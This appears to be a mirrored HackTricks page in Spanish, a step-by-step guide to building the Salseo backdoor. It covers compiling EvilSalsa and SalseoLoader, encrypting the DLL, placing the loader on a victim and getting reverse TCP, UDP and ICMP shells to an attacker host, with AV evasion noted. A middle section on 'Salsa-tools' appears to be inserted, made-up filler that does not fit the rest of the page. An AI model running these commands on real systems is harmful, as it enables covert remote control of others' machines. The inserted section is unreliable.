mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
248 lines
12 KiB
Markdown
248 lines
12 KiB
Markdown
## Salseo
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección de exclusivos [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Consigue el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
## Compilando los binarios
|
|
|
|
Descarga el código fuente de Github y compila **EvilSalsa** y **SalseoLoader**. Necesitarás tener instalado **Visual Studio** para compilar el código.
|
|
|
|
Compila ambos proyectos para la arquitectura de la máquina Windows donde los vayas a utilizar (si Windows admite x64, compílalos para esa arquitectura).
|
|
|
|
Puedes **seleccionar la arquitectura** dentro de Visual Studio en la **pestaña "Build"** en **"Platform Target".**
|
|
|
|
(\*\*Si no puedes encontrar estas opciones, presiona en la **pestaña "Project"** y luego en **"\<Nombre del proyecto> Properties"**)
|
|
|
|
![](<../.gitbook/assets/image (132).png>)
|
|
|
|
Luego, compila ambos proyectos (Build -> Build Solution) (Dentro de los registros aparecerá la ruta del ejecutable):
|
|
|
|
![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)
|
|
|
|
## Preparando la puerta trasera
|
|
|
|
En primer lugar, necesitarás codificar el **EvilSalsa.dll**. Para hacerlo, puedes usar el script de Python **encrypterassembly.py** o puedes compilar el proyecto **EncrypterAssembly**:
|
|
|
|
### **Python**
|
|
```
|
|
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
|
|
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
|
|
```
|
|
### Windows
|
|
|
|
### Resumen
|
|
|
|
Este apartado describe técnicas para crear backdoors en sistemas Windows.
|
|
|
|
### Salsa-tools
|
|
|
|
Salsa-tools es una colección de herramientas para crear backdoors en sistemas Windows. Incluye herramientas para crear backdoors en archivos ejecutables, DLLs y servicios de Windows.
|
|
|
|
#### SalsaRAT
|
|
|
|
SalsaRAT es una herramienta para crear backdoors en archivos ejecutables de Windows. La herramienta permite crear backdoors en archivos ejecutables existentes o crear nuevos archivos ejecutables con backdoors.
|
|
|
|
Para crear un backdoor en un archivo ejecutable existente, se puede utilizar el siguiente comando:
|
|
|
|
```
|
|
salsarat.exe -i input.exe -o output.exe -p password
|
|
```
|
|
|
|
Este comando creará un nuevo archivo ejecutable llamado `output.exe` que incluirá un backdoor. El backdoor se activará cuando se ejecute el archivo `output.exe` con la contraseña especificada.
|
|
|
|
Para crear un nuevo archivo ejecutable con un backdoor, se puede utilizar el siguiente comando:
|
|
|
|
```
|
|
salsarat.exe -o output.exe -p password
|
|
```
|
|
|
|
Este comando creará un nuevo archivo ejecutable llamado `output.exe` que incluirá un backdoor. El backdoor se activará cuando se ejecute el archivo `output.exe` con la contraseña especificada.
|
|
|
|
#### SalsaDLL
|
|
|
|
SalsaDLL es una herramienta para crear backdoors en DLLs de Windows. La herramienta permite crear backdoors en DLLs existentes o crear nuevas DLLs con backdoors.
|
|
|
|
Para crear un backdoor en una DLL existente, se puede utilizar el siguiente comando:
|
|
|
|
```
|
|
salsadll.exe -i input.dll -o output.dll -p password
|
|
```
|
|
|
|
Este comando creará una nueva DLL llamada `output.dll` que incluirá un backdoor. El backdoor se activará cuando se cargue la DLL con la contraseña especificada.
|
|
|
|
Para crear una nueva DLL con un backdoor, se puede utilizar el siguiente comando:
|
|
|
|
```
|
|
salsadll.exe -o output.dll -p password
|
|
```
|
|
|
|
Este comando creará una nueva DLL llamada `output.dll` que incluirá un backdoor. El backdoor se activará cuando se cargue la DLL con la contraseña especificada.
|
|
|
|
#### SalsaService
|
|
|
|
SalsaService es una herramienta para crear backdoors en servicios de Windows. La herramienta permite crear backdoors en servicios existentes o crear nuevos servicios con backdoors.
|
|
|
|
Para crear un backdoor en un servicio existente, se puede utilizar el siguiente comando:
|
|
|
|
```
|
|
salsaservice.exe -i input.exe -s service_name -p password
|
|
```
|
|
|
|
Este comando creará un nuevo servicio de Windows llamado `service_name` que incluirá un backdoor. El backdoor se activará cuando se inicie el servicio con la contraseña especificada.
|
|
|
|
Para crear un nuevo servicio de Windows con un backdoor, se puede utilizar el siguiente comando:
|
|
|
|
```
|
|
salsaservice.exe -o output.exe -s service_name -p password
|
|
```
|
|
|
|
Este comando creará un nuevo archivo ejecutable llamado `output.exe` que incluirá un backdoor y un nuevo servicio de Windows llamado `service_name`. El backdoor se activará cuando se inicie el servicio con la contraseña especificada.
|
|
```
|
|
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
|
|
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
|
|
```
|
|
Ok, ahora tienes todo lo que necesitas para ejecutar todo el asunto de Salseo: el **EvilDalsa.dll codificado** y el **binario de SalseoLoader.**
|
|
|
|
**Sube el binario SalseoLoader.exe a la máquina. No deberían ser detectados por ningún AV...**
|
|
|
|
## **Ejecutar la puerta trasera**
|
|
|
|
### **Obtener una shell inversa TCP (descargando el dll codificado a través de HTTP)**
|
|
|
|
Recuerda iniciar un nc como oyente de la shell inversa y un servidor HTTP para servir el evilsalsa codificado.
|
|
```
|
|
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
|
|
```
|
|
### **Obteniendo una shell inversa UDP (descargando un dll codificado a través de SMB)**
|
|
|
|
Recuerda iniciar un nc como oyente de la shell inversa, y un servidor SMB para servir el archivo evilsalsa codificado (impacket-smbserver).
|
|
```
|
|
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
|
|
```
|
|
### **Obteniendo una shell inversa ICMP (dll codificada ya dentro de la víctima)**
|
|
|
|
**Esta vez necesitarás una herramienta especial en el cliente para recibir la shell inversa. Descarga:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
|
|
|
|
#### **Desactivar respuestas ICMP:**
|
|
```
|
|
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
|
|
|
#You finish, you can enable it again running:
|
|
sysctl -w net.ipv4.icmp_echo_ignore_all=0
|
|
```
|
|
#### Ejecutar el cliente:
|
|
```
|
|
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
|
|
```
|
|
#### Dentro de la víctima, ejecutemos la técnica salseo:
|
|
```
|
|
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
|
|
```
|
|
## Compilando SalseoLoader como DLL exportando función principal
|
|
|
|
Abre el proyecto SalseoLoader usando Visual Studio.
|
|
|
|
### Agrega antes de la función principal: \[DllExport]
|
|
|
|
![](<../.gitbook/assets/image (2) (1) (1) (1).png>)
|
|
|
|
### Instala DllExport para este proyecto
|
|
|
|
#### **Herramientas** --> **Gestor de paquetes NuGet** --> **Administrar paquetes NuGet para la solución...**
|
|
|
|
![](<../.gitbook/assets/image (3) (1) (1) (1).png>)
|
|
|
|
#### **Busca el paquete DllExport (usando la pestaña Examinar) y presiona Instalar (y acepta el mensaje emergente)**
|
|
|
|
![](<../.gitbook/assets/image (4) (1) (1) (1).png>)
|
|
|
|
En la carpeta de tu proyecto aparecerán los archivos: **DllExport.bat** y **DllExport\_Configure.bat**
|
|
|
|
### **D**esinstala DllExport
|
|
|
|
Presiona **Desinstalar** (sí, es extraño, pero confía en mí, es necesario)
|
|
|
|
![](<../.gitbook/assets/image (5) (1) (1) (2).png>)
|
|
|
|
### **Cierra Visual Studio y ejecuta DllExport\_configure**
|
|
|
|
Simplemente **cierra** Visual Studio
|
|
|
|
Luego, ve a tu carpeta de **SalseoLoader** y **ejecuta DllExport\_Configure.bat**
|
|
|
|
Selecciona **x64** (si lo vas a usar dentro de una caja x64, ese fue mi caso), selecciona **System.Runtime.InteropServices** (dentro de **Namespace for DllExport**) y presiona **Aplicar**
|
|
|
|
![](<../.gitbook/assets/image (7) (1) (1) (1).png>)
|
|
|
|
### **Abre el proyecto de nuevo con Visual Studio**
|
|
|
|
**\[DllExport]** ya no debería estar marcado como error
|
|
|
|
![](<../.gitbook/assets/image (8) (1).png>)
|
|
|
|
### Compila la solución
|
|
|
|
Selecciona **Tipo de salida = Biblioteca de clases** (Proyecto --> Propiedades de SalseoLoader --> Aplicación --> Tipo de salida = Biblioteca de clases)
|
|
|
|
![](<../.gitbook/assets/image (10) (1).png>)
|
|
|
|
Selecciona la **plataforma x64** (Proyecto --> Propiedades de SalseoLoader --> Compilar --> Destino de la plataforma = x64)
|
|
|
|
![](<../.gitbook/assets/image (9) (1) (1).png>)
|
|
|
|
Para **compilar** la solución: Compilar --> Compilar solución (Dentro de la consola de salida aparecerá la ruta de la nueva DLL)
|
|
|
|
### Prueba la DLL generada
|
|
|
|
Copia y pega la DLL donde quieras probarla.
|
|
|
|
Ejecuta:
|
|
```
|
|
rundll32.exe SalseoLoader.dll,main
|
|
```
|
|
Si no aparece ningún error, ¡probablemente tienes una DLL funcional!
|
|
|
|
## Obtener una shell usando la DLL
|
|
|
|
No olvides usar un **servidor HTTP** y configurar un **escucha nc**.
|
|
|
|
### Powershell
|
|
```
|
|
$env:pass="password"
|
|
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
|
|
$env:lhost="10.2.0.5"
|
|
$env:lport="1337"
|
|
$env:shell="reversetcp"
|
|
rundll32.exe SalseoLoader.dll,main
|
|
```
|
|
### CMD
|
|
|
|
CMD (abreviatura de Command Prompt) es una herramienta de línea de comandos que se utiliza para ejecutar comandos en sistemas operativos Windows. Es una herramienta muy útil para los hackers, ya que les permite ejecutar comandos y scripts de forma remota en sistemas comprometidos. Algunos de los comandos más comunes que se utilizan en CMD incluyen "dir" (para listar los archivos y carpetas en un directorio), "cd" (para cambiar de directorio), "netstat" (para mostrar las conexiones de red activas) y "tasklist" (para mostrar los procesos en ejecución).
|
|
```
|
|
set pass=password
|
|
set payload=http://10.2.0.5/evilsalsax64.dll.txt
|
|
set lhost=10.2.0.5
|
|
set lport=1337
|
|
set shell=reversetcp
|
|
rundll32.exe SalseoLoader.dll,main
|
|
```
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Obtén la [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|